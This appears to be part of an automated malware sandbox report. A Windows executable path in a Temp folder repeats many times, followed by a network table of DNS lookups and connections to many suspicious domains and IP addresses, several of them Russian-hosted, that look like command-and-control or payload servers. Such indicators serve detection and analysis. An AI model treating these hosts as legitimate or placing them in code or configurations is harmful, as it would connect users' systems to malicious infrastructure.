"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
US 8.8.8.8:53 calmingtefxtures.run udp
US 172.67.158.171:443 calmingtefxtures.run tcp
US 8.8.8.8:53 foresctwhispers.top udp
US 104.21.48.1:443 foresctwhispers.top tcp
US 8.8.8.8:53 tracnquilforest.life udp
US 172.67.164.79:443 tracnquilforest.life tcp
RU 176.113.115.6:80 176.113.115.6 tcp
US 8.8.8.8:53 collapimga.fun udp
US 172.67.166.247:443 collapimga.fun tcp
US 172.67.166.247:443 collapimga.fun tcp
US 172.67.166.247:443 collapimga.fun tcp
RU 185.215.113.115:80 185.215.113.115 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 presentymusse.world udp
US 8.8.8.8:53 uncertainyelemz.bet udp
US 8.8.8.8:53 hobbyedsmoker.live udp
US 8.8.8.8:53 deaddereaste.today udp
US 8.8.8.8:53 subawhipnator.life udp
US 8.8.8.8:53 privileggoe.live udp
US 8.8.8.8:53 boltetuurked.digital udp
US 8.8.8.8:53 pastedeputten.life udp
US 8.8.8.8:53 steamcommunity.com udp
FR 2.18.131.137:443 steamcommunity.com tcp
US 8.8.8.8:53 disobilittyhell.live udp
US 172.67.137.158:443 disobilittyhell.live tcp
US 172.67.137.158:443 disobilittyhell.live tcp
US 172.67.137.158:443 disobilittyhell.live tcp
US 8.8.8.8:53 paleboreei.biz udp
US 172.67.181.243:443 paleboreei.biz tcp
US 172.67.181.243:443 paleboreei.biz tcp
US 172.67.181.243:443 paleboreei.biz tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 bbcnas2.zapto.org udp
US 195.177.94.176:8041 bbcnas2.zapto.org tcp
GB 45.155.103.183:1488 tcp
US 8.8.8.8:53 privileggoe.live udp
US 104.21.48.1:443 foresctwhispers.top tcp
US 8.8.8.8:53 pirtyoffensiz.bet udp
US 8.8.8.8:53 uncertainyelemz.bet udp
US 8.8.8.8:53 hobbyedsmoker.live udp
US 8.8.8.8:53 dsfljsdfjewf.info udp
US 8.8.8.8:53 deaddereaste.today udp
US 8.8.8.8:53 subawhipnator.life udp
US 8.8.8.8:53 privileggoe.live udp
US 8.8.8.8:53 decreaserid.world udp
US 8.8.8.8:53 pastedeputten.life udp
US 8.8.8.8:53 steamcommunity.com udp
FR 2.18.131.137:443 steamcommunity.com tcp
US 172.67.137.158:443 disobilittyhell.live tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 172.67.164.79:443 tracnquilforest.life tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 cobolrationumelawrtewarms.com udp
NL 107.189.27.66:80 cobolrationumelawrtewarms.com tcp
US 172.67.137.158:443 disobilittyhell.live tcp
DE 104.194.157.122:80 104.194.157.122 tcp
US 172.67.137.158:443 disobilittyhell.live tcp
US 8.8.8.8:53 presentymusse.world udp
US 8.8.8.8:53 deaddereaste.today udp
US 8.8.8.8:53 subawhipnator.life udp
US 8.8.8.8:53 privileggoe.live udp
US 8.8.8.8:53 boltetuurked.digital udp
US 8.8.8.8:53 pastedeputten.life udp
US 8.8.8.8:53 steamcommunity.com udp
FR 2.18.131.137:443 steamcommunity.com tcp
US 172.67.137.158:443 disobilittyhell.live tcp
US 172.67.158.171:443 calmingtefxtures.run tcp
US 104.21.48.1:443 foresctwhispers.top tcp
US 172.67.164.79:443 tracnquilforest.life tcp
US 172.67.166.247:443 collapimga.fun tcp
US 172.67.166.247:443 collapimga.fun tcp
US 172.67.166.247:443 collapimga.fun tcp
US 172.67.137.158:443 disobilittyhell.live tcp
US 8.8.8.8:53 youtube.com udp
NL 142.251.36.46:443 youtube.com tcp
NL 142.251.36.46:443 youtube.com tcp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 spocs.getpocket.com udp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 firefox-api-proxy.cdn.mozilla.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
